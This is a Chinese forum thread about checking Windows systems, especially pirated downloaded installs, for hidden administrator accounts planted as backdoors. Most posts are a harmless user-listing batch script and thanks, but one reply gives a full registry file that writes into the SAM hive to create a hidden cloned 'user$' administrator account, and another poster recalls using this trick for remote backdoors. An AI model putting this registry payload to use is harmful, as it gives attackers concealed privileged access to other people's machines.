检查你的系统有没有隐藏的管理员

yy2372575

许多朋友安装的都是网上下载的系统，很有可能他里面有别人留下的隐藏的超级管理员账号作为入侵的后门，让我们快快检查一下，保证自己安全

kmfly

下一个看下自己的系统先

namejm

　　CMD命令行下，用 net user 也可以查看的。如果要查找更详细的信息，可以用如下DOS批处理代码来实现：

1. 
   
2. @echo off
   
3. cd.>netuser.txt
   
4. for /f "skip=4 tokens=1-3" %%i in ('net user') do (
   
5.     if not "%%i"=="命令成功完成。" net use %%i>>netuser.txt 2>nul
   
6.     if not "%%j"=="" net user %%j>>netuser.txt 2>nul
   
7.     if not "%%k"=="" net user %%k>>netuser.txt 2>nul
   
8. )
   
9. start netuser.txt
   

复制代码

taoty

楼上兄弟的批处理写得确实可以，很方便的。

namejm

　　3F的代码其实只是把所有的用户罗列了出来，没有排版区分管理员和非管理员，需要根据netuser.txt的描述来判断，还是有所不便。不过这个功能是可以做到的。

emutemp

图形界面的方法有吗？

zyccb

下一个看下自己的

ccj123

楼上的简单!!

沙漠之子

用regedt32修改HKEY_LOCAL_MACHINE\SAM\SAM的权限
导入以下注册表文件,可建立一个administrator权限的user$账户
密码(就不说了),用以上方法只有8f的方法看到

再将HKEY_LOCAL_MACHINE\SAM\SAM的权限改回

1. 
   
2. Windows Registry Editor Version 5.00
   
3. 
   
4. [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\user$]
   
5. @=hex(3f0):
   
6. 
   
7. [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F0]
   
8. "F"=hex:02,00,01,00,00,00,00,00,9e,ef,02,c9,38,0e,c7,01,00,00,00,00,00,00,00,\
   
9.   00,e2,09,31,08,37,12,c7,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   
10.   f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,\
    
11.   00,00,00,00,00,00,00
    
12. "V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,1a,00,00,00,00,00,00,\
    
13.   00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,1a,00,00,00,00,00,00,00,\
    
14.   f4,00,00,00,00,00,00,00,00,00,00,00,f4,00,00,00,00,00,00,00,00,00,00,00,f4,\
    
15.   00,00,00,00,00,00,00,00,00,00,00,f4,00,00,00,00,00,00,00,00,00,00,00,f4,00,\
    
16.   00,00,00,00,00,00,00,00,00,00,f4,00,00,00,00,00,00,00,00,00,00,00,f4,00,00,\
    
17.   00,00,00,00,00,00,00,00,00,f4,00,00,00,15,00,00,00,a8,00,00,00,0c,01,00,00,\
    
18.   08,00,00,00,01,00,00,00,14,01,00,00,14,00,00,00,00,00,00,00,28,01,00,00,14,\
    
19.   00,00,00,00,00,00,00,3c,01,00,00,04,00,00,00,00,00,00,00,40,01,00,00,04,00,\
    
20.   00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\
    
21.   00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
    
22.   00,00,00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
    
23.   00,58,00,03,00,00,00,00,00,14,00,5b,03,02,00,01,01,00,00,00,00,00,01,00,00,\
    
24.   00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\
    
25.   00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,52,aa,c8,68,\
    
26.   b4,7b,73,34,07,e5,3b,2b,f4,01,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\
    
27.   02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,41,00,64,00,6d,00,\
    
28.   69,00,6e,00,69,00,73,00,74,00,72,00,61,00,74,00,6f,00,72,00,00,00,a1,7b,06,\
    
29.   74,a1,8b,97,7b,3a,67,28,00,df,57,29,00,84,76,85,51,6e,7f,10,5e,37,62,00,00,\
    
30.   ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,90,1d,78,01,\
    
31.   02,00,00,07,00,00,00,01,00,01,00,a7,67,58,96,30,a1,6e,85,59,66,b1,f9,ba,b2,\
    
32.   24,81,01,00,01,00,17,c4,df,b8,02,d9,31,e3,9e,71,6a,cf,2b,42,0d,b2,01,00,01,\
    
33.   00,01,00,01,00
    
34. 
    

复制代码

[ 本帖最后由 沙漠之子 于 2006-11-30 01:42 PM 编辑 ]

沙漠之子

不知有没有更隐蔽的方法呢

leobaidu

谢谢楼主分享，收藏了

xcrblxw

支持一下，好东西。

nhc88

很不错的东东,

ccwan

呵呵，呵呵

rock269

下载一个查查看偶个系统有没有隐藏的管理员帐号

wen200511

下一个看下自己的系统,谢谢.

shijiazhuang999

看来方法着不少 检查了一下我的没有

hkpflyrun

长见识了

face1111

很实用啊~！谢谢！

dfyql

谢谢楼主分享

清风无语

谢谢分享,辛苦了你.

evayou

10楼的可是经典的克隆管理员账号啊，记得在2000年学习hack的时候经常用这种方法远程登录克隆建后门

wjynm

呵呵，对新人有帮助的

xinyubbl

收藏了

ccdx

收下了，谢谢！

temp2005

这个难道杀毒软件查不出来吗?

yfwa2002

谢谢楼主！下载收藏